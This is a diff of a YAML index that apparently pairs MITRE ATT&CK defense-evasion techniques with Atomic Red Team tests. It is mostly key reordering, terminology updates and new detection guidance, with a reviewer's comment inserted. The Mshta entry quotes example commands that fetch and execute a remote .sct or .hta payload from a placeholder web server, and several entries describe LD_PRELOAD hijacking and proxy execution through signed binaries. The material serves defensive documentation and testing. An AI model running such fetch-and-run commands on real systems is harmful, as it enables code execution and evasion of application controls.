- Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. Adversaries may set the LD_PRELOAD environment variable to point at malicious libraries that match the name of legitimate libraries which are requested by a victim program, causing the operating system to load the adversary's malicious code upon execution of the victim program. This environment variable is used to control when different shared libraries are loaded by a program.(Citation: TLDP Shared Libraries) Libraries specified by this variable with be loaded and mapped into memory by dlopen() and mmap() respectively.(Citation: Code Injection on Linux and macOS) (Citation: Uninformed Needle) (Citation: Phrack halfdead 1997)
+ Adversaries may execute their own malicious payloads by hijacking the dynamic linker used to load libraries. The dynamic linker is used to load shared library dependencies needed by an executing program. The dynamic linker will typically check provided absolute paths and common directories for these dependencies, but can be overridden by shared objects specified by LD_PRELOAD to be loaded before all others.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries)
- LD_PRELOAD hijacking is a method of executing arbitrary code, abusing how environment variables are used to load alternate shared libraries during process execution. LD_PRELOAD hijacking may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via LD_PRELOAD hijacking may also evade detection from security products since the execution is masked under a legitimate process.
+ Adversaries may set LD_PRELOAD to point to malicious libraries that match the name of legitimate libraries which are requested by a victim program, causing the operating system to load the adversary's malicious code upon execution of the victim program. LD_PRELOAD can be set via the environment variable or /etc/ld.so.preload file.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries) Libraries specified by LD_PRELOAD with be loaded and mapped into memory by dlopen() and mmap() respectively.(Citation: Code Injection on Linux and macOS) (Citation: Uninformed Needle) (Citation: Phrack halfdead 1997)
+
+ LD_PRELOAD hijacking may grant access to the victim process's memory, system/network resources, and possibly elevated privileges. Execution via LD_PRELOAD hijacking may also evade detection from security products since the execution is masked under a legitimate process.
name: LD_PRELOAD
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
object_marking_refs:
@@ -25822,6 +26588,10 @@ defense-evasion:
- source_name: mitre-attack
external_id: T1574.006
url: https://attack.mitre.org/techniques/T1574/006
+ - source_name: Man LD.SO
+ url: https://www.man7.org/linux/man-pages/man8/ld.so.8.html
+ description: Kerrisk, M. (2020, June 13). Linux Programmer's Manual. Retrieved
+ June 15, 2020.
- source_name: TLDP Shared Libraries
url: https://www.tldp.org/HOWTO/Program-Library-HOWTO/shared-libraries.html
description: The Linux Documentation Project. (n.d.). Shared Libraries. Retrieved
@@ -25847,20 +26617,20 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-26T18:46:55.796Z'
+ modified: '2020-06-15T21:59:25.358Z'
created: '2020-03-13T20:09:59.569Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_detection: |-
- Monitor for changes to environment variables, as well as the commands to implement these changes.
-
- Monitor processes for unusual activity (e.g., a process that does not use the network begins to do so). Track library metadata, such as a hash, and compare libraries that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates.
+ x_mitre_platforms:
+ - Linux
x_mitre_data_sources:
- Process monitoring
- File monitoring
- Environment variable
- x_mitre_platforms:
- - Linux
+ x_mitre_detection: |-
+ Monitor for changes to environment variables and files associated with loading shared libraries such as LD_PRELOAD, as well as the commands to implement these changes.
+
+ Monitor processes for unusual activity (e.g., a process that does not use the network begins to do so). Track library metadata, such as a hash, and compare libraries that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates.
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
identifier: T1574.006
atomic_tests:
- name: Shared Library Injection via /etc/ld.so.preload
@@ -25955,22 +26725,22 @@ defense-evasion:
phase_name: defense-evasion
modified: '2020-03-29T23:12:40.041Z'
created: '2020-02-04T19:24:27.774Z'
- x_mitre_platforms:
- - macOS
- - Linux
- x_mitre_data_sources:
- - Process command-line parameters
- - Process monitoring
- - File monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ - root
x_mitre_detection: |-
Monitor and investigate attempts to modify ACLs and file/directory ownership. Many of the commands used to modify ACLs and file/directory ownership are built-in system utilities and may generate a high false positive alert rate, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible.
Consider enabling file/directory permission change auditing on folders containing key binary/configuration files.
- x_mitre_permissions_required:
- - User
- - root
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Process monitoring
+ - File monitoring
+ x_mitre_platforms:
+ - macOS
+ - Linux
identifier: T1222.002
atomic_tests:
- name: chmod - Change file or folder mode (numeric mode)
@@ -26212,21 +26982,21 @@ defense-evasion:
phase_name: initial-access
modified: '2020-03-23T21:48:41.083Z'
created: '2020-03-13T20:26:46.695Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - Authentication logs
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
+ - User
x_mitre_detection: Perform regular audits of local system accounts to detect
accounts that may have been created by an adversary for persistence. Look
for suspicious account behavior, such as accounts logged in at odd times or
outside of business hours.
- x_mitre_permissions_required:
- - Administrator
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Authentication logs
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1127.001:
technique:
@@ -26247,28 +27017,28 @@ defense-evasion:
description: |-
Adversaries may use MSBuild to proxy execution of code through a trusted Windows utility. MSBuild.exe (Microsoft Build Engine) is a software build platform used by Visual Studio. It handles XML formatted project files that define requirements for loading and building various platforms and configurations.(Citation: MSDN MSBuild)
- Adversaries can abuse MSBuild to proxy execution of malicious code. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# code to be inserted into an XML project file.(Citation: MSDN MSBuild) MSBuild will compile and execute the inline task. MSBuild.exe is a signed Microsoft binary, so when it is used this way it can execute arbitrary code and bypass application whitelisting defenses that are configured to allow MSBuild.exe execution.(Citation: LOLBAS Msbuild)
+ Adversaries can abuse MSBuild to proxy execution of malicious code. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# code to be inserted into an XML project file.(Citation: MSDN MSBuild) MSBuild will compile and execute the inline task. MSBuild.exe is a signed Microsoft binary, so when it is used this way it can execute arbitrary code and bypass application control defenses that are configured to allow MSBuild.exe execution.(Citation: LOLBAS Msbuild)
id: attack-pattern--c92e3d68-2349-49e4-a341-7edca2deff96
type: attack-pattern
kill_chain_phases:
- phase_name: defense-evasion
kill_chain_name: mitre-attack
- modified: '2020-03-29T19:56:43.201Z'
+ modified: '2020-06-08T23:29:28.074Z'
created: '2020-03-27T21:50:26.042Z'
- x_mitre_platforms:
- - Windows
- x_mitre_data_sources:
- - Process monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_system_requirements:
+ - " .NET Framework version 4 or higher"
x_mitre_detection: Use process monitoring to monitor the execution and arguments
of MSBuild.exe. Compare recent invocations of those binaries with prior history
of known good arguments and executed binaries to determine anomalous and potentially
adversarial activity. Command arguments used before and after invocation of
the utilities may also be useful in determining the origin and purpose of
the binary being executed.
- x_mitre_system_requirements:
- - " .NET Framework version 4 or higher"
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process monitoring
+ x_mitre_platforms:
+ - Windows
identifier: T1127.001
atomic_tests:
- name: MSBuild Bypass Using Inline Tasks
@@ -26324,30 +27094,30 @@ defense-evasion:
phase_name: privilege-escalation
modified: '2020-02-18T18:03:37.481Z'
created: '2020-02-18T18:03:37.481Z'
- x_mitre_platforms:
- - Windows
- x_mitre_data_sources:
- - Process command-line parameters
- - Process monitoring
- - Access tokens
- - API monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_effective_permissions:
+ - SYSTEM
+ x_mitre_permissions_required:
+ - Administrator
+ - User
+ x_mitre_defense_bypassed:
+ - Windows User Account Control
+ - System access controls
+ - File system access controls
x_mitre_detection: |-
If an adversary is using a standard command-line shell, analysts can detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the runas command. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging)
If an adversary is using a payload that calls the Windows token APIs directly, analysts can detect token manipulation only through careful analysis of user network activity, examination of running processes, and correlation with other endpoint and network behavior.
Analysts can also monitor for use of Windows APIs such as LogonUser and SetThreadToken and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.
- x_mitre_defense_bypassed:
- - Windows User Account Control
- - System access controls
- - File system access controls
- x_mitre_permissions_required:
- - Administrator
- - User
- x_mitre_effective_permissions:
- - SYSTEM
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Process monitoring
+ - Access tokens
+ - API monitoring
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1036.004:
technique:
@@ -26385,14 +27155,12 @@ defense-evasion:
phase_name: defense-evasion
modified: '2020-03-29T20:21:11.895Z'
created: '2020-02-10T20:30:07.426Z'
- x_mitre_platforms:
- - Windows
- - Linux
- x_mitre_data_sources:
- - Windows Registry
- - Process monitoring
- - Process command-line parameters
- - Windows event logs
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ - SYSTEM
x_mitre_detection: Look for changes to tasks and services that do not correlate
with known software, patch cycles, etc. Suspicious program execution through
scheduled tasks or services may show up as outlier processes that have not
@@ -26402,17 +27170,24 @@ defense-evasion:
of a chain of behavior that could lead to other activities, such as network
connections made for Command and Control, learning details about the environment
through Discovery, and Lateral Movement.
- x_mitre_permissions_required:
- - User
- - Administrator
- - SYSTEM
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Windows Registry
+ - Process monitoring
+ - Process command-line parameters
+ - Windows event logs
+ x_mitre_platforms:
+ - Windows
+ - Linux
atomic_tests: []
T1036:
technique:
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ id: attack-pattern--42e8de7b-37b2-4258-905a-6897815e58e0
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Masquerading
+ description: |-
+ Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
+
+ Renaming abusable system utilities to evade security monitoring is also a form of [Masquerading](https://attack.mitre.org/techniques/T1036).(Citation: LOLBAS Main Site)
external_references:
- source_name: mitre-attack
external_id: T1036
@@ -26432,18 +27207,13 @@ defense-evasion:
url: https://twitter.com/ItsReallyNick/status/1055321652777619457
description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading.
Retrieved April 22, 2019.
- description: |-
- Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
-
- Renaming abusable system utilities to evade security monitoring is also a form of [Masquerading](https://attack.mitre.org/techniques/T1036).(Citation: LOLBAS Main Site)
- name: Masquerading
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- id: attack-pattern--42e8de7b-37b2-4258-905a-6897815e58e0
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-29T20:26:01.837Z'
+ modified: '2020-07-09T13:54:28.727Z'
created: '2017-05-31T21:30:38.511Z'
x_mitre_platforms:
- Linux
@@ -26456,7 +27226,7 @@ defense-evasion:
Look for indications of common characters that may indicate an attempt to trick users into misidentifying the file type, such as a space as the last character of a file name or the right-to-left override characters"\u202E", "[U+202E]", and "%E2%80%AE”.
x_mitre_defense_bypassed:
- - Whitelisting by file name or path
+ - Application control by file name or path
x_mitre_data_sources:
- Process command-line parameters
- File monitoring
@@ -26467,7 +27237,7 @@ defense-evasion:
- Nick Carr, FireEye
- David Lu, Tripwire
- Felipe Espósito, @Pr0teus
- - ENDGAME
+ - Elastic
- Bartosz Jerzman
x_mitre_version: '1.3'
x_mitre_is_subtechnique: false
@@ -26502,25 +27272,25 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-29T20:23:00.913Z'
+ modified: '2020-06-20T22:11:45.970Z'
created: '2020-02-10T20:43:10.239Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_defense_bypassed:
+ - Application control by file name or path
+ x_mitre_detection: |-
+ Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Likewise, files that are modified outside of an update or patch are suspect.
+
+ If file names are mismatched between the file name on disk and that of the binary's PE metadata, this is a likely indicator that a binary was renamed after it was compiled. Collecting and comparing disk and resource filenames for binaries by looking to see if the InternalName, OriginalFilename, and/or ProductName match what is expected could provide useful leads, but may not always be indicative of malicious activity. (Citation: Endgame Masquerade Ball) Do not focus on the possible names a file could have, but instead on the command-line arguments that are known to be used and are distinct because it will have a better rate of detection.(Citation: Twitter ItsReallyNick Masquerading Update)
x_mitre_data_sources:
- File monitoring
- Process monitoring
- Process command-line parameters
- Binary file metadata
- x_mitre_detection: |-
- Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Likewise, files that are modified outside of an update or patch are suspect.
-
- If file names are mismatched between the file name on disk and that of the binary's PE metadata, this is a likely indicator that a binary was renamed after it was compiled. Collecting and comparing disk and resource filenames for binaries by looking to see if the InternalName, OriginalFilename, and/or ProductName match what is expected could provide useful leads, but may not always be indicative of malicious activity. (Citation: Endgame Masquerade Ball) Do not focus on the possible names a file could have, but instead on the command-line arguments that are known to be used and are distinct because it will have a better rate of detection.(Citation: Twitter ItsReallyNick Masquerading Update)
- x_mitre_defense_bypassed:
- - Whitelisting by file name or path
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1556:
technique:
@@ -26547,7 +27317,8 @@ defense-evasion:
description: "Adversaries may modify authentication mechanisms and processes
to access user credentials or enable otherwise unwarranted access to accounts.
The authentication process is handled by mechanisms, such as the Local Security
- Authentication Server (LSASS) process and the Security Accounts Manager (SAM),
+ Authentication Server (LSASS) process and the Security Accounts Manager (SAM)
+ on Windows or pluggable authentication modules (PAM) on Unix-based systems,
responsible for gathering, storing, and validating credentials. \n\nAdversaries
may maliciously modify a part of this process to either reveal credentials
or bypass authentication mechanisms. Compromised credentials or access may
@@ -26562,12 +27333,15 @@ defense-evasion:
phase_name: credential-access
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-25T20:59:05.357Z'
+ modified: '2020-07-13T21:23:01.762Z'
created: '2020-02-11T19:01:56.887Z'
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: false
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - File monitoring
+ - Authentication logs
+ - API monitoring
+ - Windows Registry
+ - Process monitoring
+ - DLL monitoring
x_mitre_detection: "Monitor for new, unfamiliar DLL files written to a domain
controller and/or local computer. Monitor for changes to Registry entries
for password filters (ex: HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Notification
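Review bot: The `- x_mitre_platforms:` removal and `+ x_mitre_data_sources:` addition here are the same fields reappearing in a different order (the platforms come back at the end of the next hunk), so most of this hunk and the T1112, T1218.005, T1564.004, T1070.005, T1027, T1218.008, T1134.004, T1550.002 and T1550.003 hunks below are reorder-only churn around a handful of real content changes. If this index is emitted by a script, sorting the `x_mitre_*` keys (or preserving the upstream STIX key order) before dumping would keep an ATT&CK refresh reviewable and let the substantive edits — the PAM detection text in T1556, the new T1578 entry, the T1551.005→T1070.005 rename — stand out. The T1556 mapping this hunk edits starts before the hunk.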
@@ -26577,23 +27351,72 @@ defense-evasion:
for calls to OpenProcess that can be used to manipulate lsass.exe
running on a domain controller as well as for malicious modifications to functions
exported from authentication-related system DLLs (such as cryptdll.dll and
- samsrv.dll).(Citation: Dell Skeleton) \n\nConfigure robust, consistent account
- activity audit policies across the enterprise and with externally accessible
- services. (Citation: TechNet Audit Policy) Look for suspicious account behavior
- across systems that share accounts, either user, admin, or service accounts.
- Examples: one account logged into multiple systems simultaneously; multiple
- accounts logged into the same machine simultaneously; accounts logged in at
- odd times or outside of business hours. Activity may be from interactive login
- sessions or process ownership from accounts being used to execute binaries
- on a remote system as a particular account. Correlate other security systems
- with login information (e.g., a user has an active login session but has not
- entered the building or does not have VPN access)."
+ samsrv.dll).(Citation: Dell Skeleton) \n\nMonitor PAM configuration and module
+ paths (ex: /etc/pam.d/) for changes. Use system-integrity tools
+ such as AIDE and monitoring tools such as auditd to monitor PAM files.\n\nConfigure
+ robust, consistent account activity audit policies across the enterprise and
+ with externally accessible services. (Citation: TechNet Audit Policy) Look
+ for suspicious account behavior across systems that share accounts, either
+ user, admin, or service accounts. Examples: one account logged into multiple
+ systems simultaneously; multiple accounts logged into the same machine simultaneously;
+ accounts logged in at odd times or outside of business hours. Activity may
+ be from interactive login sessions or process ownership from accounts being
+ used to execute binaries on a remote system as a particular account. Correlate
+ other security systems with login information (e.g., a user has an active
+ login session but has not entered the building or does not have VPN access)."
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ - macOS
+ atomic_tests: []
+ T1578:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1578
+ url: https://attack.mitre.org/techniques/T1578
+ - source_name: Mandiant M-Trends 2020
+ url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
+ description: FireEye / Mandiant. (2020, February). M-Trends 2020. Retrieved
+ April 24, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Modify Cloud Compute Infrastructure
+ description: |-
+ An adversary may attempt to modify a cloud account's compute service infrastructure to evade defenses. A modification to the compute service infrastructure can include the creation, deletion, or modification of one or more components such as compute instances, virtual machines, and snapshots.
+
+ Permissions gained from the modification of infrastructure components may bypass restrictions that prevent access to existing infrastructure. Modifying infrastructure components may also allow an adversary to evade detection and remove evidence of their presence.(Citation: Mandiant M-Trends 2020)
+ id: attack-pattern--144e007b-e638-431d-a894-45d90c54ab90
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ modified: '2020-06-19T14:46:00.117Z'
+ created: '2019-08-30T18:03:05.864Z'
+ x_mitre_detection: Establish centralized logging for the activity of cloud compute
+ infrastructure components. Monitor for suspicious sequences of events, such
+ as the creation of multiple snapshots within a short period of time or the
+ mount of a snapshot to a new instance by a new or unexpected user. To reduce
+ false positives, valid change management procedures could introduce a known
+ identifier that is logged with the change (e.g., tag or header) if supported
+ by the cloud provider, to help distinguish valid, expected actions from malicious
+ ones.
x_mitre_data_sources:
- - Authentication logs
- - API monitoring
- - Windows Registry
- - Process monitoring
- - DLL monitoring
+ - Stackdriver logs
+ - GCP audit logs
+ - Azure activity logs
+ - AWS CloudTrail logs
+ x_mitre_is_subtechnique: false
+ x_mitre_version: '1.0'
+ x_mitre_permissions_required:
+ - User
+ x_mitre_platforms:
+ - AWS
+ - GCP
+ - Azure
atomic_tests: []
T1112:
technique:
@@ -26650,32 +27473,32 @@ defense-evasion:
phase_name: defense-evasion
modified: '2020-03-29T22:52:55.930Z'
created: '2017-05-31T21:31:23.587Z'
- x_mitre_version: '1.1'
- x_mitre_contributors:
- - Bartosz Jerzman
- - Travis Smith, Tripwire
- - David Lu, Tripwire
- x_mitre_data_sources:
- - Windows Registry
- - File monitoring
- - Process monitoring
- - Process command-line parameters
- - Windows event logs
- x_mitre_defense_bypassed:
- - Host forensic analysis
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ - SYSTEM
x_mitre_detection: |-
Modifications to the Registry are normal and occur throughout typical use of the Windows operating system. Consider enabling Registry Auditing on specific keys to produce an alertable event (Event ID 4657) whenever a value is changed (though this may not trigger when values are created with Reghide or other evasive methods). (Citation: Microsoft 4657 APR 2017) Changes to Registry entries that load software on Windows startup that do not correlate with known software, patch cycles, etc., are suspicious, as are additions or changes to files within the startup folder. Changes could also include new services and modification of existing binary paths to point to malicious files. If a change to a service-related entry occurs, then it will likely be followed by a local or remote service start or restart to execute the file.
Monitor processes and command-line arguments for actions that could be taken to change or delete information in the Registry. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), which may require additional logging features to be configured in the operating system to collect necessary information for analysis.
Monitor for processes, command-line arguments, and API calls associated with concealing Registry keys, such as Reghide. (Citation: Microsoft Reghide NOV 2006) Inspect and cleanup malicious hidden Registry entries using Native Windows API calls and/or tools such as Autoruns (Citation: SpectorOps Hiding Reg Jul 2017) and RegDelNull (Citation: Microsoft RegDelNull July 2016).
- x_mitre_permissions_required:
- - User
- - Administrator
- - SYSTEM
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: false
+ x_mitre_defense_bypassed:
+ - Host forensic analysis
+ x_mitre_data_sources:
+ - Windows Registry
+ - File monitoring
+ - Process monitoring
+ - Process command-line parameters
+ - Windows event logs
+ x_mitre_contributors:
+ - Bartosz Jerzman
+ - Travis Smith, Tripwire
+ - David Lu, Tripwire
+ x_mitre_version: '1.1'
identifier: T1112
atomic_tests:
- name: Modify Registry of Current User Profile - cmd
@@ -26798,8 +27621,8 @@ defense-evasion:
but outside of the browser. (Citation: MSDN HTML Applications)\n\nFiles may
be executed by mshta.exe through an inline script: mshta vbscript:Close(Execute(\"GetObject(\"\"script:https[:]//webserver/payload[.]sct\"\")\"))\n\nThey
may also be executed directly from URLs: mshta http[:]//webserver/payload[.]hta\n\nMshta.exe
- can be used to bypass application whitelisting solutions that do not account
- for its potential use. Since mshta.exe executes outside of the Internet Explorer's
+ can be used to bypass application control solutions that do not account for
+ its potential use. Since mshta.exe executes outside of the Internet Explorer's
security context, it also bypasses browser security settings. (Citation: LOLBAS
Mshta)"
name: Mshta
@@ -26845,28 +27668,28 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-27T21:13:44.990Z'
+ modified: '2020-06-20T22:35:27.613Z'
created: '2020-01-23T19:32:49.557Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_permissions_required:
- - User
- x_mitre_defense_bypassed:
- - Application whitelisting
- - Digital Certificate Validation
- x_mitre_detection: |-
- Use process monitoring to monitor the execution and arguments of mshta.exe. Look for mshta.exe executing raw or obfuscated script within the command-line. Compare recent invocations of mshta.exe with prior history of known good arguments and executed .hta files to determine anomalous and potentially adversarial activity. Command arguments used before and after the mshta.exe invocation may also be useful in determining the origin and purpose of the .hta file being executed.
-
- Monitor use of HTA files. If they are not typically used within an environment then execution of them may be suspicious
+ x_mitre_platforms:
+ - Windows
+ x_mitre_contributors:
+ - Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank
+ - Ricardo Dias
x_mitre_data_sources:
- File monitoring
- Process command-line parameters
- Process monitoring
- x_mitre_contributors:
- - Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank
- - Ricardo Dias
- x_mitre_platforms:
- - Windows
+ x_mitre_detection: |-
+ Use process monitoring to monitor the execution and arguments of mshta.exe. Look for mshta.exe executing raw or obfuscated script within the command-line. Compare recent invocations of mshta.exe with prior history of known good arguments and executed .hta files to determine anomalous and potentially adversarial activity. Command arguments used before and after the mshta.exe invocation may also be useful in determining the origin and purpose of the .hta file being executed.
+
+ Monitor use of HTA files. If they are not typically used within an environment then execution of them may be suspicious
+ x_mitre_defense_bypassed:
+ - Application control
+ - Digital Certificate Validation
+ x_mitre_permissions_required:
+ - User
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
identifier: T1218.005
atomic_tests:
- name: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject
@@ -26929,11 +27752,17 @@ defense-evasion:
name: powershell
T1218.007:
technique:
+ created: '2020-01-24T14:38:49.266Z'
+ modified: '2020-06-20T22:38:14.154Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ type: attack-pattern
id: attack-pattern--365be77f-fc0e-42ee-bac8-4faf806d9336
description: |-
Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) Msiexec.exe is digitally signed by Microsoft.
- Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it is signed and native on Windows systems, msiexec.exe can be used to bypass application whitelisting solutions that do not account for its potential abuse.
+ Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it is signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse.
name: Msiexec
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
object_marking_refs:
@@ -26953,31 +27782,25 @@ defense-evasion:
url: https://blog.trendmicro.com/trendlabs-security-intelligence/attack-using-windows-installer-msiexec-exe-leads-lokibot/
description: Co, M. and Sison, G. (2018, February 8). Attack Using Windows
Installer msiexec.exe leads to LokiBot. Retrieved April 18, 2019.
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- modified: '2020-03-29T16:31:56.086Z'
- created: '2020-01-24T14:38:49.266Z'
- x_mitre_data_sources:
- - DLL monitoring
- - Process command-line parameters
- - Process monitoring
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_permissions_required:
- - User
- x_mitre_defense_bypassed:
- - Digital Certificate Validation
- - Application whitelisting
+ x_mitre_platforms:
+ - Windows
x_mitre_detection: Use process monitoring to monitor the execution and arguments
of msiexec.exe. Compare recent invocations of msiexec.exe with prior history
of known good arguments and executed MSI files or DLLs to determine anomalous
and potentially adversarial activity. Command arguments used before and after
the invocation of msiexec.exe may also be useful in determining the origin
and purpose of the MSI files or DLLs being executed.
- x_mitre_platforms:
- - Windows
+ x_mitre_defense_bypassed:
+ - Digital Certificate Validation
+ - Application control
+ x_mitre_permissions_required:
+ - User
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - DLL monitoring
+ - Process command-line parameters
+ - Process monitoring
identifier: T1218.007
atomic_tests:
- name: Msiexec.exe - Execute Local MSI file
@@ -27104,29 +27927,29 @@ defense-evasion:
phase_name: defense-evasion
modified: '2020-03-29T22:46:56.308Z'
created: '2020-03-13T20:33:00.009Z'
- x_mitre_platforms:
- - Windows
- x_mitre_data_sources:
- - Process command-line parameters
- - API monitoring
- - File monitoring
+ x_mitre_contributors:
+ - Oddvar Moe, @oddvarmoe
+ - Red Canary
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_system_requirements:
+ - NTFS partitioned hard drive
+ x_mitre_defense_bypassed:
+ - Anti-virus
+ - Host forensic analysis
+ - Signature-based detection
x_mitre_detection: |-
Forensic techniques exist to identify information stored in NTFS EA. (Citation: Journey into IR ZeroAccess NTFS EA) Monitor calls to the ZwSetEaFile and ZwQueryEaFile Windows API functions as well as binaries used to interact with EA, (Citation: Oddvar Moe ADS1 Jan 2018) (Citation: Oddvar Moe ADS2 Apr 2018) and consider regularly scanning for the presence of modified information. (Citation: SpectorOps Host-Based Jul 2017)
There are many ways to create and interact with ADSs using Windows utilities. Monitor for operations (execution, copies, etc.) with file names that contain colons. This syntax (ex: file.ext:ads[.ext]) is commonly associated with ADSs. (Citation: Microsoft ADS Mar 2014) (Citation: Oddvar Moe ADS1 Jan 2018) (Citation: Oddvar Moe ADS2 Apr 2018) For a more exhaustive list of utilities that can be used to execute and create ADSs, see https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f.
The Streams tool of Sysinternals can be used to uncover files with ADSs. The dir /r command can also be used to display ADSs. (Citation: Symantec ADS May 2009) Many PowerShell commands (such as Get-Item, Set-Item, Remove-Item, and Get-ChildItem) can also accept a -stream parameter to interact with ADSs. (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)
- x_mitre_defense_bypassed:
- - Anti-virus
- - Host forensic analysis
- - Signature-based detection
- x_mitre_system_requirements:
- - NTFS partitioned hard drive
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Oddvar Moe, @oddvarmoe
- - Red Canary
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - API monitoring
+ - File monitoring
+ x_mitre_platforms:
+ - Windows
identifier: T1564.004
atomic_tests:
- name: Alternate Data Streams (ADS)
@@ -27245,12 +28068,12 @@ defense-evasion:
'
name: powershell
- T1551.005:
